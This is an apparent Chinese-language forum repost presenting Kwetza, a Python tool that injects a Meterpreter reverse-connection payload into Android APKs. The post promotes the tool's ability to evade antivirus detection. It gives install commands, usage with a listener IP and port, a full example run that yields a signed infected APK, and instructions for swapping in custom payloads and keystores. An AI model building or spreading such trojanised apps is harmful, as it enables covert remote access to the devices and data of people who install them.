好友
阅读权限25
听众
最后登录1970-1-1
|
本帖最后由 lucifer2046 于 2017-7-21 11:26 编辑
kwetza – 在Android应用中植入meterpreter payload的python脚本
Kwetza能够让你将Meterpreter payload植入到Android应用中。它能用默认或自定义的payload模板感染Android程序,不会被杀毒软件检测出来。
Kwetza能够让你将Meterpreter payload植入到Android应用中。它能用默认或自定义的payload模板感染Android程序,不会被杀毒软件检测出来。Kwetza可以使用原app默认的权限,也可以在app中添加权限以获得更多功能。
获取代码
git clone https://github.com/sensepost/kwetza.git
Kwetza需要BeautifulSoup才能正常运行,我们用pip进行安装:
pip install beautifulsoup4
另外我们还需要安装apktool,参考这里的安装教程:https://ibotpeaches.github.io/Apktool/install
软件使用
python kwetza.py nameOfTheApkToInfect.apkLHOST LPORT yes/no
参数说明:
nameOfTheApkToInfect.apk = 希望植入payload的apk文件名
LHOST = 监听IP
LPORT = 监听端口
yes = 选择yes则会添加额外的权限,选择no则会利用app原来的权限
运行示例
python kwetza.py hackme.apk 10.42.0.118 4444 yes
[+] MMMMMM KWETZA DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS BYTING COMMS... ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
########################################### EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.
###########################################
[+] L00t located at hackme/dist/hackme.apk
备注
Kwetza以Python 2开发。
Kwetza默认会使用payload文件夹下的模板和keystore在apk中植入恶意payload。
如果要用自己的证书签署应用,把你的keystore重命名为mykey.keystore放在payload文件夹下。
你也可以用同样的方法替换默认的payload模板
默认keystore的密码是”password”
*参考来源:Github,本文作者:Sphinx
|
免费评分
-
查看全部评分
|
发帖前要善用【论坛搜索】功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。 |
|
|
|
|